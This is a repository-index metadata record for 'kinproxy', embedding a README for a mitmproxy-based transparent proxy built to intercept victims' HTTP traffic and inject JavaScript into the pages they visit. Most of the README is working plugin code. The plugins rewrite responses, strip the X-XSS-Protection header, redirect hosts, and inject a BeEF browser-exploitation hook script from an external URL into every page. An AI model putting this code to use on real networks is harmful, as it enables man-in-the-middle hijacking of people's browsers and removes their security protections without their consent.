{"id":13827325,"url":"https://github.com/mh4x0f/kinproxy","last_synced_at":"2025-05-05T23:23:04.903Z","repository":{"id":79632282,"uuid":"118152644","full_name":"mh4x0f/kinproxy","owner":"mh4x0f","description":"my implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses. CLI ","archived":false,"fork":false,"pushed_at":"2018-12-07T00:49:33.000Z","size":22,"stargazers_count":6,"open_issues_count":0,"forks_count":2,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-03-31T00:41:15.638Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mh4x0f.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2018-01-19T16:55:34.000Z","updated_at":"2022-09-10T23:12:21.000Z","dependencies_parsed_at":null,"dependency_job_id":"fcb444cd-c9c2-4fdb-b89f-b31cb605c808","html_url":"https://github.com/mh4x0f/kinproxy","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mh4x0f%2Fkinproxy","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mh4x0f%2Fkinproxy/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mh4x0f%2Fkinproxy/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mh4x0f%2Fkinproxy/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mh4x0f","download_url":"https://codeload.github.com/mh4x0f/kinproxy/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":252591248,"owners_count":21773055,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T09:01:54.188Z","updated_at":"2025-05-05T23:23:04.882Z","avatar_url":"https://github.com/mh4x0f.png","language":"Python","funding_links":[],"categories":["Python (1887)","\u003ca id=\"42f9e068b6511bcbb47d6b2b273097da\"\u003e\u003c/a\u003e未分类","Python"],"sub_categories":["\u003ca id=\"3bd67ee9f322e2c85854991c85ed6da0\"\u003e\u003c/a\u003e投毒\u0026\u0026Poisoning"],"readme":"# kinproxy\n\nmy implements transparent proxies (mitmproxy) can use to intercept and manipulate HTTP traffic modifying requests and responses.\n\n## Instalation\n\n``` sh\n$ sudo apt-get update\n$ sudo apt-get install -y python-pip libffi-dev\n$ libssl-dev libxml2-dev libxslt1-dev zlib1g-dev\n$ sudo apt-get install -y python-qt4\n$ sudo apt-get install -y python-dev git\n$ sudo apt-get install -y libpcap-dev\n$ sudo pip install -r requirements.txt\n$ sudo pip install mitmproxy==0.18.2\n```\n\n Transparent proxies(mitmproxy) that you can use to intercept and manipulate HTTP traffic modifying requests and responses, that allow to inject javascripts into the targets visited.  You can easily implement a module to inject data into pages creating a python file in directory \"plugins/\" automatically will be loaded.\n#### Plugins Example Dev\n\n ``` python\nfrom mitmproxy.models import decoded # for decode content html\nfrom plugins.extension.plugin import PluginTemplate\n\nclass Nameplugin(PluginTemplate):\n    meta = {\n        'Name'      : 'Nameplugin',\n        'Version'   : '1.0',\n        'Description' : 'Brief description of the new plugin',\n        'Author'    : 'by dev'\n    }\n    def __init__(self):\n        for key,value in self.meta.items():\n            self.__dict__[key] = value\n        # if you want set arguments check refer wiki more info.\n        self.ConfigParser = False # No require arguments\n\n    def request(self, flow):\n        print flow.__dict__\n        print flow.request.__dict__\n        print flow.request.headers.__dict__ # request headers\n        host = flow.request.pretty_host # get domain on the fly requests\n        versionH = flow.request.http_version # get http version\n\n        # get redirect domains example\n        # pretty_host takes the \"Host\" header of the request into account,\n        if flow.request.pretty_host == \"example.org\":\n            flow.request.host = \"mitmproxy.org\"\n\n        # get all request Header example\n        self.send_output.emit(\"\\n[{}][HTTP REQUEST HEADERS]\".format(self.Name))\n        for name, valur in flow.request.headers.iteritems():\n            self.send_output.emit('{}: {}'.format(name,valur))\n\n        print flow.request.method # show method request\n        # the model printer data\n        self.send_output.emit('[NamePlugin]:: this is model for save data logging')\n\n    def response(self, flow):\n        print flow.__dict__\n        print flow.response.__dict__\n        print flow.response.headers.__dict__ #convert headers for python dict\n        print flow.response.headers['Content-Type'] # get content type\n\n        #every HTTP response before it is returned to the client\n        with decoded(flow.response):\n            print flow.response.content # content html\n            flow.response.content.replace('\u003c/body\u003e','\u003ch1\u003einjected\u003c/h1\u003e\u003c/body\u003e') # replace content tag\n\n        del flow.response.headers[\"X-XSS-Protection\"] # remove protection Header\n\n        flow.response.headers[\"newheader\"] = \"foo\" # adds a new header\n        #and the new header will be added to all responses passing through the proxy\n```\n\n### Overview\nFirst of all write the import plugin tamplate\n``` python\nfrom plugins.extension.plugin import PluginTemplate\n```\nthe basic plugin example:\n``` python\nfrom plugins.extension.plugin import PluginTemplate\n\n\nclass Example(PluginTemplate):\n    meta = {\n        'Name'      : 'exampleplugin',\n        'Version'   : '1.0',\n        'Description' : 'description of plugin',\n        'Author'    : 'by dev Name',\n    }\n\n    def __init__(self):\n        for key,value in self.meta.items():\n            self.__dict__[key] = value\n        self.ConfigParser = False # requeire args\n\n    def request(self, flow): # get all request HTTP traffic\n        pass\n\n    def response(self, flow): # get all response HTTP traffic\n        pass\n```\n\n### Modify Packets\nSimple fuctions that just adds a header to every request..\n ``` python\n    def response(self, flow):\n        flow.response.headers[\"newheader\"] = \"foo\" # adds a new header\n```\n\nexample from mitmproxy how to redirect connections (IP spoofing)\n ``` python\n    def request(self, flow):\n        if flow.client_conn.ssl_established:\n            flow.request.scheme = \"https\"\n            sni = flow.client_conn.connection.get_servername()\n            port = 443\n        else:\n            flow.request.scheme = \"http\"\n            sni = None\n            port = 80\n\n        host_header = flow.request.pretty_host\n        m = parse_host_header.match(host_header)\n        if m:\n            host_header = m.group(\"host\").strip(\"[]\")\n            if m.group(\"port\"):\n                port = int(m.group(\"port\"))\n\n        flow.request.host = sni or host_header\n        flow.request.port = port\n```\n\nanother example how to rewrite packet in real time\n ``` python\nfrom mitmproxy.models import decoded # for decode content html\nfrom plugins.extension.plugin import PluginTemplate\n\nclass Nameplugin(PluginTemplate):\n    meta = {\n        'Name'      : 'Nameplugin',\n        'Version'   : '1.0',\n        'Description' : 'Brief description of the new plugin',\n        'Author'    : 'by dev'\n    }\n    def __init__(self):\n        for key,value in self.meta.items():\n            self.__dict__[key] = value\n        # if you want set arguments check refer wiki more info.\n        self.ConfigParser = False # No require arguments\n\n    def request(self, flow):\n        print flow.__dict__\n        print flow.request.__dict__\n        print flow.request.headers.__dict__ # request headers\n        host = flow.request.pretty_host # get domain on the fly requests\n        versionH = flow.request.http_version # get http version\n\n        # get redirect domains example\n        # pretty_host takes the \"Host\" header of the request into account,\n        if flow.request.pretty_host == \"example.org\":\n            flow.request.host = \"mitmproxy.org\"\n\n        # get all request Header example\n        self.send_output.emit(\"\\n[{}][HTTP REQUEST HEADERS]\".format(self.Name))\n        for name, valur in flow.request.headers.iteritems():\n            self.send_output.emit('{}: {}'.format(name,valur))\n\n        print flow.request.method # show method request\n        # the model printer data\n        self.send_output.emit('[NamePlugin]:: this is model for save data logging')\n\n    def response(self, flow):\n        print flow.__dict__\n        print flow.response.__dict__\n        print flow.response.headers.__dict__ #convert headers for python dict\n        print flow.response.headers['Content-Type'] # get content type\n\n        #every HTTP response before it is returned to the client\n        with decoded(flow.response):\n            print flow.response.content # content html\n            flow.response.content.replace('\u003c/body\u003e','\u003ch1\u003einjected\u003c/h1\u003e\u003c/body\u003e') # replace content tag\n\n        del flow.response.headers[\"X-XSS-Protection\"] # remove protection Header\n\n        flow.response.headers[\"newheader\"] = \"foo\" # adds a new header\n        #and the new header will be added to all responses passing through the proxy\n```\n\n### Logging\nif you want to save data(pumpkin-prxoy.log) in your plugin, just use self.send_output.emit('msg here')\n ``` python\n    def request(self, flow):\n        self.send_output.emit('[example]:: this is hellow WiFi-Pumpkin')\n```\n### How to add argumments\nNow, if you want to add argumments in proxy.ini, you need to add in directory \"core/pumpkinProxy.ini\" the key (exampleplugin and set_exampleplugin).\n\n* exampleplugin key is the option checkbox to change and enable or disable plugin\n* set_exampleplugin this is key for search all argumments in Settings option.\n![plugin_key](http://i.imgur.com/oSvErrZ.png)\n\n### Example from WiFi-Pumpkin with Argummets\n``` python\nclass beef(PluginTemplate):\n    meta = {\n        'Name'      : 'beef',\n        'Version'   : '1.0',\n        'Description' : 'this module proxy inject hook beef api url.[Hook URL]',\n        'Author'    : 'Marcos Nesster'\n    }\n    def __init__(self):\n        for key,value in self.meta.items():\n            self.__dict__[key] = value\n        self.ConfigParser = True\n        self.urlhook = self.config.get_setting('set_beef','hook')\n\n    def request(self, flow):\n        pass\n\n    def response(self,flow):\n        with decoded(flow.response):  # Remove content encoding (gzip, ...)\n            html = BeautifulSoup(flow.response.content)\n            \"\"\"\n            # To Allow CORS\n            if \"Content-Security-Policy\" in flow.response.headers:\n                del flow.response.headers[\"Content-Security-Policy\"]\n            \"\"\"\n            if html.body:\n                script = html.new_tag(\n                    'script',\n                    src=self.urlhook)\n                html.body.insert(0, script)\n                flow.response.content = str(html)\n                self.send_output.emit(\"[{}] Injected BeFF url hook...\".format(self.Name))\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmh4x0f%2Fkinproxy","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmh4x0f%2Fkinproxy","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmh4x0f%2Fkinproxy/lists"}